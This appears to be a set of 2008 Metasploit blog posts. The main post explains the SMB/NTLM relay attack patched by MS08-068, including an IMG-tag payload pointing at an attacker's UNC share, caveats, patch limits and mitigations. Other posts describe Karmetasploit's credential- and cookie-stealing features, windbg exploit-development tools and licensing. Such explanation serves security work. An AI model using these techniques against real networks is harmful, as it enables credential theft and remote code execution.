The Metasploit Blog

Today, Microsoft released bulletin MS08-068, which addresses a well-known flaw in the SMB authentication protocol. This attack was first publicly documented by Sir Dystic during @tlantacon in 2001 and implemented in Metasploit 3 in July of 2007. The attack abuses a design flaw in how SMB/NTLM authentication is implemented and works as follows.

The SMB client tries to access a remote SMB service on an attacker's machine. A user can be forced to access the SMB resource if they are running Internet Explorer or Outlook by sending them to a UNC link. This can be accomplished with an IMG tag like the following:

<img src="\\Attacker\Share\pic.jpg">

The attacker's SMB server is configured to deny access to anonymous users (NULL sessions). This forces Windows to authenticate using the username, domain, and password of the logged-in user. The password is first hashed based on the LANMAN/NTLM mechanism. During the authentication process, a random eight byte challenge key is sent from the server to the client. The hashed LANMAN/NTLM password is then encrypted again with the server-supplied challenge key. The actual password hash sent across the network to the server is unique for a particular password and challenge key. The username and domain are sent in clear text.

The challenge key is where things get interesting. If the server intentionally picks a static challenge key for every connection, it is possible to perform a rainbow table attack against the password hash. In this scenario, the attacker would have precalculated the value of every possible password encrypted against the static challenge key. A set of rainbow tables for "HALF-LANMAN" hashes can be found at the Free Rainbow Tables web site. Even without a rainbow table, the challenge-key password hash can be brute forced with tools like Cain & Able and Ophcrack. This is the attack implemented by the original version of SMB Relay and the SMB Capture module of the Metasploit Framework. The MS08-068 patch does not address this issue, since its part of the protocol design.

Taking this further, the attacker can connect back to the victim, ask them for their challenge key, and then pass this key back to the victim's client connection. The client will then encrypt their hashed password against this key and send it to the attacker. The attacker then uses this hashed password to authenticate back to the victim, using their own credentials against them. This is the attack implemented by SMB Relay 2, the Metasploit Framework, and the one patched today in MS08-068.

The Metasploit module takes over the established, authenticated SMB session, disconnects the client, and uses the session to upload and execute shellcode in a manner similar to how psexec.exe operates. First, a Windows executable is created that acts like a valid Windows service and executes the specified Metasploit payload. This payload is then uploaded to the root of the ADMIN$ share of the victim. Once the payload has been uploaded, the Service Control Manager is accessed over DCERPC (using a named pipe over SMB) and used to create a new service (pointing at the uploaded executable) and then start it. This service creates a new suspended process, injects the shellcode into it, resumes the process, and shuts itself down. The module then deletes the created service. At this point, the attacker has a remote shell (or other payload session) on the victim.

There are some caveats. First, the victim must have ports 139 or 445 open and accessible to the attacker. Second, the victim's user account must have administrative access to their own machine. Third, if the victim's OS is Windows XP or 2003, they must have a password set for their account. Fourth, if the machine is XP, the system must be configured to allow remote network logins as the specified user and not Guest (the default). The exploitable setting becomes the default when the machine joins a Windows domain. Fifth, the user must have access to write to ADMIN$ and permissions to create and start Windows services. While most administrative accounts have these rights, domain policies can come into play. Finally, if SMB signing is configured as mandatory, this attack won't work because the signature will fail.

The MS08-068 patch addresses this attack only in the case where the attacker connects back to the victim. The patch works by checking the received challenge key against a list of active keys that its own SMB service has issued. If the challenge key matches the list, the authentication process fails. This form of the attacker is described as "reflection" by the Microsoft SWI team. The Karmetasploit implementation uses this attack by default, providing remote code execution in any environment where Metasploit can influence the network of the victim (WPAD, WiFi, MITM, etc). This attack works great even in very isolated environments, such as an airplane full of Windows users at 30,000 feet. You can find more details on this form of the attack and its resolution on the SWI blog.

The patch does NOT address the case where the attacker relays the connection to a third-party host that the victim has access to. This can be accomplished by setting the SMBHOST parameter in the Metasploit smb_relay module to a third-party server. There are many cases where this is useful, especially in LAN environments where various tools authenticate to all local hosts with a domain administrator account (vulnerability scanners, inventory management, network monitor software, etc). In this situation, the attacker would relay the connection to another local system (domain controller, workstation, etc) and abuse this to obtain remote code execution. The third-party attack can also be used to relay inbound SMB credentials to a remote non-SMB service that accepts NTLM authentication (POP3, IMAP4, SMTP, HTTP via IIS, etc). More information about non-SMB NTLM relaying can be found at the Squirtle web site.

Mandatory SMB signing can prevent this attack, but it also breaks backwards compatibility with older operating systems. The MS08-068 patch is an elegant solution to a particular method of exploiting a design flaw, but it does not correct the flaw itself. This patch should be mandatory for road warriors and anyone who uses an untrusted network (wireless or otherwise), since without knowledge or connectivity to a third-party host, the relayed credentials are not useful. The SMB protocol and NTLM authentication mechanism are quite fun to play with and relaying attacks are just the tip of the icerberg :-)

Update: Bob McMillan found this old advisory, which summarizes the reflection attack.

Update: Credit for the original discovery of the MITM/Relay method should be given to Dominique Brezinski, who published a paper on this topic in 1996 and spoke at Black Hat 1997.

-HD
Feedback?

The Uninformed Journal has released volume 10! Skywing wrote a great article on bypassing client-side restrictions on the GPS device for the HTC Titan. Skape rocks it yet again with a new technique for bypassing malware unpackers using dual memory mappings. Mxatone digs into three vulnerabilities in win32k.sys that were patched with MS08-025 and demonstrates how to find and exploit bugs in this subsystem. Finally, I wrote an article on penetration testing IPv6 nodes on the local network, which is a detailed version of the SecTOR 2008 'Exploiting IPv6' mini-talk.
Feedback?

The slides from the talk egypt and I gave at SecTOR 2008 are now online. One of the highlights was a change in licensing -- instead of the existing EULA-like license, the 3.2 release will be provided under the 3-clause BSD license. The text below is an extended version of a rant I shared with Kelly Jackson Higgins over at Dark Reading.

The original version of Metasploit (1.0 and 2.x) was available dual-licensed under the GPL and Perl Artistic License. The goal was to make the framework interoperable with other security tools and help out other open source developers with a well-written codebase. However, once Metasploit 2 started to pick up steam (50,000+ users), we started to see commercial entities take advantage of the license to the detriment of the project.

In one case, a product vendor was selling laptops containing Metasploit 2 for the sole purposing of demonstrating how their product could detect it. The original license allowed for this, but we do want people who use the software to contribute back, and we want to make sure that any "demo" use is based on the original version of the software and not one that a vendor has modified. We never saw a bug fix, patch, or suggestion from the group within that vendor which was using it for this purpose. We want the Metasploit name to be consistent with a certain level of quality, which we could not guarantee when a vendor was using a possibly modified version to demonstrate their product's detection capabilities.

In other example, we noticed that a company which specializes in vulnerability assessment products had a Google Adword on the term "Metasploit". When we followed the link back their web site, we saw a commercial exploit product which appeared to have exploit-for-exploit coverage matching the Metasploit Framework. Eventually, I spoke with a developer and a manager at this company and determined that they were not actually using the framework code. They were, however, using the Metasploit Framework as a reference to create their own "competitive" product. Again, this falls within the rules of the license, but between the Google Adwords, the competitive marketing materials, and the lack of any feedback, patches, or bug reports, we considered this to be a truly offensive use of our code.

When we (the original three developers of 2.x) started to work on the 3.0 version, we decided to take a new approach to licensing. We created a company to hold the rights to the new source code, transferred our copyrights to this company, and hired a lawyer to draw up a suitable license with our requirements. The goal was not to prevent commercial use, but to keep commercial entities from harming our project by using our own code against us. Once the new license was announced, we were suprised by the amount of support we received from the community. Our new license granted us redistribution rights to all contributions we received. Our contributors were still happy to send in patches and improvements under this license.

Fast-forward two years and we have a codebase of over 300,000 lines of Ruby code (not including all of the assembler and C), a massive user base, a strong community of contributors, and a decent reputation as a software project. The license successfully prevented the types of abuses that we found so annoying with the 2.x versions. Since the original 3.0 release, there have been some organizational changes within the project, including the loss of both spoonm and skape as core developers. Filling their shoes are mc, egypt, patrickw, et, I)ruid, ramon, pusscat, and a handful of other folks from the community.

Of the three members of the holding company that owns the Metasploit source code and trademarks, I am the only one still involved in the project. This situation is what lead to the new license. We have a new group of core developers and a handful of contributors who were limited in what they could do with the framework ecause of the license. Since the 3.0 release, the project has come a long way, both in terms of features and industry recognition. We believed that changing the license to be as open as possible (BSD 3-clause is early public domain) would not only be fair to the new developers, but allow us to expand beyond the original goal as an exploit platform and become the basis for wide variety of new projects.

The new license will lead to commercial abuse, but I believe that the project is now strong enough to succeed even with competition from commercial entities that are using our source code. The key to our success is the Metasploit community and our dedication to sharing security information (and code) in a timely fashion. Metasploit is great at destroying FUD, whether the source is an incompetent product vendor or a media-happy security company.

The new license allows a new level of customization and purpose-specific derivatives. Its entirely likely that we will see new projects targeted at individual sectors and applications (SCADAsploit, anyone?), which we hope will filter some improvements back to the core project. By opening the license to the entire Metasploit codebase, we have let the proverbial cats out of the bag, its now just a matter of counting kittens.

-HD
Feedback?

Silence can mean one of two things - the project is dead, or we are working on some really big things and aren't quite ready to announce them. Well, the project is not dead :-) In the next two weeks, some major changes will be announced that cover the source code, development team, and licensing of the Metasploit Framework. Folks who have been following the development tree may not be suprised, but we are taking some giant steps forward from the 3.1 release.

In the meantime, users should stay away from Ruby 1.8.7. Over the last few months, more and more OS distributions have been upgrading their standard Ruby interpreters from 1.8.5/1.8.6 to 1.8.7. Unfortunately, this version broke the ability to use short-name constants. This type of code is scattered throughout the Metasploit Framework and is tricky to track down. Even knowing what the problem is, there is no clean workaround that doesn't throw out the benefits of using short-name constants in the first place (which are used to make code readable among other things). How can you tell if you hit this bug? The error below is just one example:

[-] Exploit failed: uninitialized constant Msf::ModuleSet::NDR

In the short-term, the framework will display a warning message if the interpreter version matches "1.8.7". Once the Ruby team pushes a new version that incorporates the patch (which is already in the stable development tree), this warning will be removed, and a more complex check will be put in place instead.

If anyone is looking for a deeper understanding of the framework and many of the new features, there are still a few seats left in my Powersploitation class at the SecTor 2008 Security Conference. You can tell the class material is fresh when the code it refers to is still being written ;-)
Feedback?

Goaded by some coworkers about the opcode searching functionality of windbg prompted me to add a new option to jutsu today: searchOpcode

You can search for sets of instructions in conjunction, it will assemble them, providing you the machine code, then search for the instructions in executable memory. Instructions are delimited by pipes. I plan to add some limited wildcard functionality in the near future as well.

0:000> !jutsu searchOpcode pop ecx | pop ecx | ret
[J] Searching for:
> pop ecx
> pop ecx
> ret
[J] Machine Code:
> 59 59 c3
[J] Opcode sequence found at: 0x004012f9
Feedback?

Today, HD merged in an amalgamation of windbg tools and plugins with a funny name into the main metasploit tree. We've been working on this collection for awhile now, and currently it represents (I think) a good step towards turning windbg from simply a good debugger into a powerful platform for exploit development.

The work that's currently released includes:

tenketsu - the vista heap emulator/visualizer which allows you to track how input to a program effects the heap in real time.

jutsu - a set of tools for tracking buffers through memory, determining what is controlled at crash time, and discovery of valid relative return addresses based on it

mushishi - a framework (with examples) for the detection and defeat of anti-debugging methods.

Used in conjunction with metasploit, jutsu in particular can significantly speed up exploit development time as it understands and makes use of msfpattern buffers natively. The README file can be found in the tree at external/source/byakugan/README and details functionality, usage, build, and installation. For the slides from the preliminary release at toorcon seattle, go here.

Currently we're looking for more suggestions for functionality. Anything that you do commonly and think may be automatable is up for discussion.
Feedback?

I just posted the first public documentation on Karmetasploit. This project is a combination of Dino Dai Zovi and Shane Macaulay's KARMA and the Metasploit Framework. The result is an extremely effective way to absorb information and remote shells from the wireless-enabled machines around you. This first version is still a proof-of-concept, but it already has an impressive feature list:

- Capture POP3 and IMAP4 passwords (clear-text and SSL)
- Accept outbound email sent over SMTP
- Parse out FTP and HTTP login information
- Steal cookies from large lists of popular web sites
- Steal saved form fields from the same web sites
- Use SMB relay attacks to load the Meterpreter payload
- Automatically exploit a wide range of browser flaws

One of the cool features is the probe-to-beacon code that we submitted as a patch to airbase-ng. Windows XP and Mac OS X systems use probe requests to determine if any of their preferred wireless networks are in range. Windows Vista no longer sends probes, instead it listens for a beacon containing the name of a preferred network. The new feature of airbase-ng (-C XX) allows one probing client to be used to discover a client that is listening for beacons. This works by rebroadcasting all probed networks as beacons for a short period of time. The result is that all actively-probing clients can be used to discover passive clients that are listening for the same network name :-)
Feedback?

InfoWorld has just released the Best of Open Source Software Awards. The Metasploit Framework received an award in the category of Best of open source in security:

"When we first saw Metasploit back in 2004 at the DefCon hacker conference, we knew it would become a staple for security professionals the world over. And sure enough, Metasploit has become the de facto standard attack and penetration toolkit. Extremely extensible, and constantly updated to home in on the latest server and host vulnerabilities, Metasploit has the right stuff to test the perimeter of your network for holes, or determine whether your SQL or Web server or Unix, Linux, or Windows host can be compromised. If you have important systems to protect, point Metasploit at them yourself before someone else does"
Feedback?